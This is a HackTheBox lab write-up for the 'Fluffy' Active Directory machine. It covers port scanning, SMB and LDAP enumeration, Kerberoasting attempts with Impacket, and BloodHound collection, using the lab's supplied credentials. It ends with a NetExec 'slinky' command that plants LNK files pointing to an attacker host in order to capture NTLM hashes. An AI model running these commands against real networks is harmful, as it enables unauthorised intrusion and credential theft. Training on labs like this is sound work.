search

๐ŸƒFluffy

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

hashtag
Overview

Fluffy is an easy Windows machine from HackTheBox. This box is an Active Directory challenge, which tackles certificate abuse, Shadow Credentials attack, ADCS attacks etc.

rustscan --addresses 10.10.11.69 --ulimit 5000 -- -A -sC -Pn -sV -oN rustscan.md

chevron-right53/tcp filtered domain no-response 88/tcp filtered kerberos-sec no-response 139/tcp filtered netbios-ssn no-response 389/tcp filtered ldap no-response 445/tcp filtered microsoft-ds no-response 464/tcp filtered kpasswd5 no-response 593/tcp filtered http-rpc-epmap no-response 636/tcp filtered ldapssl no-response 3269/tcp filtered globalcatLDAPssl no-responsehashtag

chevron-rightnmap -sCV -Pn -oN nmap 10.10.11.69hashtag

nmap -T4 -p- -A -Pn -oA nmap.scan 10.10.11.69

nmap -sV -sC -oA initial -Pn 10.10.11.69

nmap -Pn -A -p 53,88,139,445,464,389,636,593,5985,3268,3269 10.10.11.69 -T5

fluffy.htb DC01.fluffy.htb

We will add in host file

echo -e '10.129.244.22\t\tDC01.fluffy.htb fluffy.htb' | sudo tee -a /etc/hosts

chevron-rightAnalysis:hashtag

  • 53/tcp (DNS): Handles domain name resolution; check for zone transfer misconfigurations.

  • 88/tcp (Kerberos): Confirms Active Directory; use for Kerberos user enumeration or ticket attacks.

  • 139/tcp (NetBIOS-SSN): Legacy Windows file/printer sharing; enumerate shares and sessions.

  • 389/tcp (LDAP): Queryable directory service; useful for enumerating AD users, groups, and policies.

  • 445/tcp (SMB): Provides file sharing and remote management; test for SMB enumeration and null sessions.

  • 464/tcp (kpasswd5): Kerberos password change service; abuseable in AS-REP roasting or password reset attacks.

  • 636/tcp (LDAPS): Encrypted LDAP; secure channel for directory queries, still useful for enumeration if authenticated.

  • 3269/tcp (GC over SSL): Global Catalog LDAP over SSL; enables cross-domain AD enumeration.

hashtag
SMB Enumeration

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users

Save the users to notepad

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares

  • First, I validated the obtained credentials to confirm they were correct (as expected for official Hack The Box credentials).

  • Although Kerberos authentication is often required, in this case the credentials worked without issue.

  • Next, I performed additional user enumeration.

  • Enumerating users is important because:

    • Any Active Directory user can potentially aid exploitation.

    • Random user accounts are useful for password spraying.

    • Some accounts may be Kerberoastable or AS-REP Roastable.

  • Afterward, I enumerated available SMB shares.

  • A default share named IT was identified, which warranted further inspection.

  • Before examining files within the share, I first checked for:

    • Kerberoasting opportunities

    • AS-REP Roasting opportunities

  • I demonstrate two approaches for this:

    • One using NetExec

    • One using Impacket

To use impacket-getuserspn, you have to obtain a ticket first itโ€™s Kerberos, so letโ€™s get our TGT and check if there are kerberoastable or AS-REP-roastable users. And yeah, you can use just impacket-getuserspn because it detects those two attacks thanks to this researcharrow-up-right.

impacket-getTGT fluffy.htb/j.fleischman:'J0elTHEM4n1990!' -dc-ip 10.10.11.69

ntpdate 10.10.11.69

impacket-getTGT fluffy.htb/j.fleischman:'J0elTHEM4n1990!' -dc-ip 10.10.11.69

export KRB5CCNAME=j.fleischman.ccache

impacket-GetUserSPNs -request -dc-ip 10.10.11.69 fluffy.htb/j.fleischman:'J0elTHEM4n1990!'

not able to crack the hash

will try the smb shares

smbclientng -d "fluffy.htb" -u 'j.fleischman' -p 'J0elTHEM4n1990!' --host 10.10.11.69

I chose to use smbclient this time because of its clean organization, and since the share contained many files, I downloaded them all for reviewโ€”after which I discovered upgrade_Notice.pdf, a pentesting report that turned out to be a goldmine of information, prompting me to search for exploit PoCs related to the referenced CVEs.

smbmap -d fluffy.htb -H 10.10.11.69 -u j.fleischman -p "J0elTHEM4n1990!"

smbclient -U 'FLUFFY.HTB/j.fleischman%J0elTHEM4n1990!' -L //DC01.fluffy.htb

smbclient -U 'FLUFFY.HTB/j.fleischman%J0elTHEM4n1990!' //DC01.fluffy.htb/IT

we can upload and download

enum4linux-ng -A fluffy.htb -u FLUFFY/j.fleischman -p 'J0elTHEM4n1990!'

hashtag
TCP/389 - LdapDomainDump

ldapdomaindump -u 'FLUFFY.HTB\j.fleischman' -p 'J0elTHEM4n1990!' -o ldd 10.10.11.69

Identify interesting users and groups

Bloodhound file generation command

nxc ldap DC01.fluffy.htb -d 'fluffy.htb' -u 'j.fleischman' -p 'J0elTHEM4n1990!' --bloodhound -c All --dns-server 10.10.11.69

nxc smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' -M slinky -o SERVER=10.10.16.8 NAME=lookhere

PreviousBlackfieldNextExternal Web Links

Last updated